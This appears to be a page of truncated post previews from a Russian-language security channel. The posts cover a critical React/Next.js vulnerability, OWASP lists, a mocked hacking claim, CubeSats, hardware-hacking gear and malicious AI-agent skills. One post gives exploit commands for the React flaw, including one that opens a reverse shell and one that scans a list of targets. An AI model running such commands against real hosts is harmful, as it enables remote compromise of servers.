Cult Of Wire

А тем временем в React и Next.js появились CVE c CVSS 10.0: - CVE-2025-55182 - CVE-2025-66478 (на cve.org отмечена как REJECTED, duplicate of CVE-2025-55182) Пошло довольно кучно: уязвимость затрагивает 19.0.0, 19.1.0, 19.1.1 и 19.2.0, а также фреймворки, использующие эти пакеты, включая Next.js 15.x и 16.x, использующие App Router. Фиксы есть в версиях: React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 PoC пока не появился, но думаю, что можно ждать у...

А тем временем в React и Next.js появились CVE c CVSS 10.0: - CVE-2025-55182 - CVE-2025-66478 (на cve.org отмечена как REJECTED, duplicate of CVE-2025-55182) Пошло довольно кучно: уязвимость затрагивает 19.0.0, 19.1.0, 19.1.1 и 19.2.0, а также фреймворки…

Взлом века себе за щеку. Anonymous France отчитались в Twitter (оно же X) о взломе ftp на сайте Кремля. Звучит внушающе, если не смотреть на скриншоты. А там прекрасно всё: - Имена пользователей в дореволюционном стиле - Шизофренический контент документов - user: root - Бэкап базы в 24 килобайта. Как-то обмельчал современный Anonymous. Евстафий Гертдудович просил передать: Носок дошлый самостоятельно природа мучительно собеседник.

OWASP опубликовали OWASP Top 10:2025 RC1. Как предварительно будет выглядеть новый Top 10: - A01:2025 - Broken Access Control - A02:2025 - Security Misconfiguration - A03:2025 - Software Supply Chain Failures - A04:2025 - Cryptographic Failures - A05:2025 - Injection - A06:2025 - Insecure Design - A07:2025 - Authentication Failures - A08:2025 - Software or Data Integrity Failures - A09:2025 - Logging & Alerting Failures - A10:2025 - Mishandling of Exceptional Conditions Появились новые категории...

Модель Cubesat это интересно, но можно собрать и настоящий. С одной стороны, вещь весьма специфичная, однако готовые проекты попадают и на сайтах вроде instructables (как вам Cubesat на HyperDuino?). Немного истории В далёком 2011 году члены Space Systems Design Studio основали проект Kicksat. Ребята собрали какое-то количество денег на Kickstaterer, успешно собрали и отправили свои кубсаты на орбиту, тем самым показав, что такое возможно не только для учёных или университетов, но и для небольши...

Пропустил новость от марта, но теперь навёрстываю: OWASP Top 10 for LLMs and Generative AI обновился (да, если кто не знал, есть и такое, я писал об этом около года назад) и теперь есть на русском языке: OWASP Top 10 для LLM и генеративного ИИ (2025) Так же появились: - Securing Agentic Applications Guide 1.0 - GenAI Incident Response Guide 1.0 Сам LLM Top 10 претерпел некоторые изменения и сейчас выглядит так: - LLM01:2025 Prompt Injection - LLM02:2025 Sensitive Information Disclosure - LLM03:2...

Небольшое продолжение по CVE-2025-55182 CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит. Получить шелл можно в одну команду: # Предварительно не забываем поднять листенер, скрипт его не поднимает. python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 # Или сразу прогнать список python3 exp.py -f targets.txt --check Подоспел и плагин для Burp: Next.js RSC RCE Scanner. По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результат...

Предлагаю сегодня поговорить об оборудовании, которым я, а также мои коллеги по аппаратному цеху, используют в своей повседневной работе. Сразу скажу, что не все из представленного списка является must-have’ным, так что можно сохранить небольшую (большую) копеечку при входе в программно-аппаратный хакинг. 1. USB-COM порт - брал на АлиЭкспрессе за 119 рублей, сейчас стоит 115 с бесплатной доставкой, что очень достойно. Нужен для подключения и управления умным оборудованием, включая промышленные м...

Advent of Cyber 2025 стартанул Это интересное путешествие в мир Securitty - как для защитников, так и для нападающих - с любым опытом. Присоединяйтесь, будет весело!

ClawdBot Skills Just Ganked Your Crypto Немного прослоупочил и пропустил важную веху в эре программного обеспечения для нейронок (или связанного с ними). Теперь это полноценный софт. По крайней мере со своими зловредами в своих "репозиториях". Кратко: - 386 вредоносных навыков маскируются под инструменты автоматизации торговли криптой. - Зловредные навыки, опубликованные пользователем hightower6eu, скачали почти 7000 раз. - Все вредоносные навыки используют один и тот же С2 (91[.]92[.]242[.]30)....